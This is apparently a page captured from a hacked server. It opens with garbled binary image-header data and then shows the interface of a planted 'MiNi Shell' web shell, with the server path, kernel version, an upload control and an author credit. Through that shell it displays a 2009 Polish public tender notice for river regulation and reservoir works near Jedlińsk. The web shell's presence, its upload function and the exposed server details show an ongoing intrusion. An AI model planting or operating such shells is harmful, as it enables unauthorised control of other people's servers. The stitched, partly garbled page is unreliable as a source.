JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090928/164673-N-2009.html

<p class="kh_header"><b>Radom: Odbudowa - kształtowanie przekroju podłużnego i poprzecznego oraz układu poziomego koryta rzeki Struga Wsolska w km 0+000 - 3+650 wraz z odbudową dwóch zbiorników retencyjnych gm. Jedlińsk - etap I - km od 0+000 ÷ 2+207</b><br>
<b>Numer ogłoszenia: 164673 - 2009; data zamieszczenia: 28.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Warszawie Oddział , ul. Wernera 4a, 26-600 Radom, woj. mazowieckie, tel. 048 3626138, faks 048 3624453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warszawa.wzmiuw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa - kształtowanie przekroju podłużnego i poprzecznego oraz układu poziomego koryta rzeki Struga Wsolska w km 0+000 - 3+650 wraz z odbudową dwóch zbiorników retencyjnych gm. Jedlińsk - etap I - km od 0+000 ÷ 2+207.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych na zadaniu /Odbudowa - kształtowanie przekroju podłużnego i poprzecznego oraz układu poziomego koryta rzeki Struga Wsolska w km 0+000 - 3+650 wraz z odbudową dwóch zbiorników retencyjnych gm. Jedlińsk - etap I - km od 0+000 ÷ 2+207/.
<br/>Lokalizacja robót: teren miejscowości Wsola, gm. Jedlińsk, powiat Radom, województwo mazowieckie.
<br/>
<br/>Główne roboty przewidziane w ramach modernizacji to budowa:
<br/>- budowli piętrząco-upustowej na rzece Struga Wsolska o świetle: próg stały b=16,4m i h=1,44m, światło ruchome b=1,0m, h=1,35m,
<br/>- 2 zbiorników retencyjnych 
<br/>nr 1 o powierzchni 0,55 ha pojemności 6000 m3 przy NPP 135,50,
<br/>nr 2 o powierzchni 0,07 ha pojemności 500 m3 przy NPP 135,40,
<br/>- kolektora odwadniającego o średnicy 400mm, L=95m i średnicy 315mm, L=112m wraz z drenażem o średnicy 126mm, L=196m,
<br/>- budowli regulacyjnych i komunikacyjnych na regulowanym odcinku rzeki (przepusty drogowe 3 szt., zastawki - 2 szt., bystrotok - 1 szt.)
oraz przebudowa:
<br/>- koryta rzeki Strugi Wsolskiej na odcinku 0+000 ÷ 2+207,
<br/>- wodociągu gminnego o średnicy 160mm, L=153m na odcinku kolidującym z projektowanym zbiornikiem nr 1,
<br/>- przebudowa linii napowietrznej SN - 15 kV - 1,5 km,
<br/>- rowu R-1 w obrębie parku na długości 336m wraz z odmuleniem rowu na długości 23m i odmuleniem przepustu drogowego na długości 47 m,
<br/>Do obowiązków Wykonawcy będzie również należało:
<br/>- złożenie i przechowywanie pozyskanego materiału drzewnego ogłowionego z gałęzi na placu budowy. Tak przygotowany materiał drzewny będzie podlegał sprzedaży, którą przeprowadzi Zamawiający. Gałęzie, karpina, resztki Wykonawca zutylizuje we własnym zakresie.
<br/>- wykonanie i umieszczenie tablicy informacyjnej o współfinansowaniu inwestycji ze środków Unii Europejskiej (wg wzoru - zał. nr 4 do SIWZ).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.23.13.00-8, 45.24.00.00-1, 45.11.12.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> <br/>1. Oferta powinna być zabezpieczona wadium w wysokości 25.000,00 zł (słownie zł: dwadzieścia pięć tysięcy złotych i 00/100). Wadium należy wnieść przed upływem terminu składania ofert.
<br/>2. Wadium może być wniesione w formie:
<br/>pieniężnej - przelewem na konto Oddziału WZMiUW w Radomiu w banku PeKaO S.A. Nr 18 1240 1789 1111 0010 1603 1257 przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego, potwierdzi, że otrzymał taki przelew najpóźniej w ostatnim dniu roboczym poprzedzającym termin składania ofert. Kopię przelewu należy załączyć do oferty. 
<br/>poręczeń bankowych lub poręczeń spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
<br/>gwarancji bankowych,
<br/>gwarancji ubezpieczeniowych, 
<br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
<br/><b>Dokumenty potwierdzające złożenie wadium w innej formie niż pieniężna, winny być wystawione na WZMiUW w Warszawie ul. Ksawerów 8, 02-656 Warszawa i złożone przed upływem terminu składania ofert w oryginale w siedzibie Oddziału WZMiUW - pokój 111, a w ofercie należy umieścić poświadczoną za zgodność kserokopię.</b><br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> <br/>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy pzp, a także spełniają warunki art. 22 ust.1 ustawy pzp i SIWZ tj.: 
<br/>1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
<br/>2. posiadają niezbędną wiedzę i doświadczenie lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.: 
<br/>a) wykażą, iż w okresie ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy, to z tego okresu zrealizowali minimum 1 robotę budowlaną odpowiadającą swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia obejmującą co najmniej następujący zakres robót:
<br/>- budowa lub przebudowa budowli piętrząco - upustowej o wys. piętrzenia większej lub równej 1,5 m
 - 1 szt.,
<br/>- budowa lub przebudowa  kanałów lub rzek o dł. większej lub równej 2200 m.
<br/>Należyte wykonanie zamówień musi być potwierdzone dokumentami (referencje lub protokóły odbioru końcowego lub inne). 
b) dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia tj.: 
<br/>-dysponują sprzętem niezbędnym do wykonania zamówienia, 
<br/>-osoby wskazane do realizacji zamówienia (przewidziane na stanowisko kierownika budowy) muszą posiadać właściwe uprawnienia budowlane do wykonywania robót w specjalności wodno - melioracyjnej lub konstrukcyjno - budowlanej (obiekty budowlane gospodarki wodnej, obiekty budowlane melioracji wodnych,  lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) z potwierdzeniem przynależności do Izby Inżynierów Budownictwa. Ponadto w trakcie realizacji robót Wykonawca zapewni wykonanie robót w zakresie przebudowy wodociągu i linii napowietrznej SN 15 kV przez osoby posiadające właściwe uprawnienia. 
<br/>3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
<br/>a) wykonawca musi posiadać środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż wartość materiałów w składanej ofercie. Za spełnienie tego warunku Zamawiający uzna załączenie przez Wykonawcę informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, w którym posiadają rachunek, potwierdzającej posiadanie środków finansowych w wymaganej wysokości lub posiadanie przez Wykonawcę zdolności kredytowej w wymaganej wysokości. 
<br/>b) wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
<br/>4. udzielą gwarancji na wykonane roboty - minimum 3 lata. 
<br/>Oferty składane wspólnie. 
<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W tym przypadku Wykonawcy ustanowią Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
<br/>2. Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza, musi znajdować się w ofercie wspólnej wykonawców. Pełnomocnictwo powinno zawierać w szczególności wskazanie: postępowania (nazwę) o zamówienie publiczne, którego dotyczy; wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby; ustanowionego Pełnomocnika oraz zakres jego umocowania, daty udzielenia pełnomocnictwa. 
<br/>3. Dokument pełnomocnictwa musi być podpisany przez wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców 
<br/>4. Oferta wspólna, składana przez dwóch lub więcej Wykonawców powinna spełniać następujące wymagania: 
<br/>a. oferowane warunki realizacji zamówienia muszą być złożone na załączonym formularzu ofertowym (form. nr 1 do SIWZ) podpisanym przez Pełnomocnika. 
<br/>b. do oferty zostaną dołączone dokumenty wymienione w pkt a) 2-5 <i>informacji o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu</i> dotyczące każdego Wykonawcy (Wspólnika), podpisane przez jego upełnomocnionych przedstawicieli i Pełnomocnika oraz pozostałe dokumenty wymienione w <i>informacji o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu</i> pkt a) 1,6-11, które łącznie będą potwierdzały spełnienie przez wykonawców występujących wspólnie warunków udziału w przetargu, o których mowa w pkt 2 i 3, podpisane przez Pełnomocnika. 
<br/>c. wadium może być wniesione przez jednego z Wykonawców lub Pełnomocnika jeżeli jest to wskazane w umowie konsorcjum lub pełnomocnictwie. Jeżeli nie ma - dokument poręczenia lub gwarancji wadialnej powinien wymieniać w treści wszystkich wykonawców. 
<br/>Dokument potwierdzający wniesienie wadium (złożony w ofercie) musi być podpisany przez Pełnomocnika. 
<br/>5. Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania; zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp. 
<br/>6. Wszyscy wspólnicy będą ponosić solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. 
<br/>7. Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez jednego ze wspólników lub od wszystkich wspólników łącznie lub od każdego z osobna, albo też w inny sposób ustalony w umowie. 
<br/>8. Przed podpisaniem umowy na realizację przedmiotu zamówienia (w przypadku wybrania oferty wspólnej) Zamawiający będzie żądał przedłożenia umowy wspólników.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> <br/>a) Zgodnie z Rozp. Prezesa Rady Ministrów z dnia 19 maja 2006r. (Dz.U. z 2006 r. Nr 87 poz. 605, par. 1 ust. 1, 2 i 3) oraz zmiany - Dz U Nr 188/2008, poz. 1155 wykonawcy złożą następujące dokumenty i wypełnione formularze: 
<br/><b>W celu</b> potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy pzp zamawiający żąda w formie oryginału lub poświadczonej kserokopii za zgodność z oryginałem następujących dokumentów: 
<br/>1. Podpisanego oświadczenia, że wykonawca spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy pzp - form. 6 stanowiący załącznik do SIWZ (w formie oryginału) 
<br/>2. Podpisanego oświadczenia, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2. ustawy pzp. - form. 7 stanowiący załącznik do SIWZ (w formie oryginału) 
<br/>3. Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 m-cy przed upływem terminu składania ofert. 
<br/>4. Aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania. 
<br/>5. Aktualnego zaświadczenia właściwego oddziału ZUS lub KRUS potwierdzającego, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenia, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu, wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert. 
<br/><b>W celu</b> potwierdzenia opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania osobami zdolnymi do wykonania zamówienia, zamawiający żąda następujących dokumentów:
<br/>6. Wykazu wykonanych robót budowlanych w ciągu ostatnich 5 lat przed dniem wszczęcia niniejszego postępowania odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (minimum jedno zamówienie) z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że roboty opisane w pkt. 2a <i>opisu warunków udziału w postępowaniu oraz opisu sposobu dokonywania oceny spełniania tych warunków</i>, zostały wykonane należycie (referencje lub protokóły odbiorów lub inne) - zgodnie z form nr 2 będącym załącznikiem do SIWZ. 
<br/>7. Wykazu osób (na stanowiskach technicznych), którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - zgodnie z form. nr 3 będącym załącznikiem do SIWZ. W przypadku, kiedy wykonawca w wykazie wskaże osoby, którymi będzie dysponował musi załączyć do wykazu pisemne zobowiązania (umowy lub oświadczenia) innych podmiotów o udostępnieniu tych osób. 
<br/>8. Uprawnienia budowlane dla osoby przewidzianej do pełnienia funkcji kierownika budowy, wymienionej w wykazie osób, o którym mowa w pkt 7 wraz z zaświadczeniem o przynależności tej osoby do Izby Inżynierów Budownictwa. 
<br/>9. Oświadczenie o posiadanym sprzęcie niezbędnym do realizacji przedmiotu zamówienia - wg formularza nr 5 będącego załącznikiem do SIWZ. 
<br/><b>W celu</b> potwierdzenia opisanego przez zamawiającego warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda następujących dokumentów: 
<br/>10. Informacji Banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości nie mniejszej niż wartość materiałów w składanej ofercie, wystawioną nie wcześniej niż 3 m-ce przed upływem terminu składania ofert. 
<br/>11. Polisy, a w przypadku jej braku, innego dokument ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
<br/>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły (spełnia) - (nie spełnia). Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem wykonawcy z postępowania z zastrzeżeniem art. 26 ust. 3 ustawy pzp. 
<br/>Przy ocenie spełnienia warunków udziału, o których mowa w pkt 2 i 3 <i>opisu warunków udziału w postępowaniu oraz opisie sposobu dokonywania oceny spełniania tych warunków</i>, przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, wielkości stanowiące o spełnieniu warunków będą zsumowane. 
<br/>b) Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej. 
<br/>Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz U Nr 87, poz. 605 oraz zmiany Dz U Nr 188/2008, poz. 1155), jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP zamiast dokumentów, o których mowa w pkt. a) 3, 4, 5 składa dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
<br/>1) nie otwarto jego likwidacji ani nie ogłoszono upadłości 
<br/>2) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
<br/>3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
<br/>Dokumenty, o których mowa w pkt 1), 3) powinny być wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo ofert, a w pkt 2) - 3 m-ce przed upływem terminu składania ofert. 
<br/>Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt b) 1) - 3) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę za zgodność.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 70</li>
<li>2 - Okres gwarancji - 30</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.warszawa.wzmiuw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zarząd Melioracji i Urządzeń Wodnych w Warszawie Oddział w Radomiu - pokój nr 115, ul. Wernera 4a, 26-600 Radom.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2009 godzina 10:00, miejsce: Sekretariat Wojewódzkiego Zarządu Melioracji i Urządzeń Wodnych w Warszawie Oddział w Radomiu - pokój nr 102, ul. Wernera 4a, 26-600 Radom.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com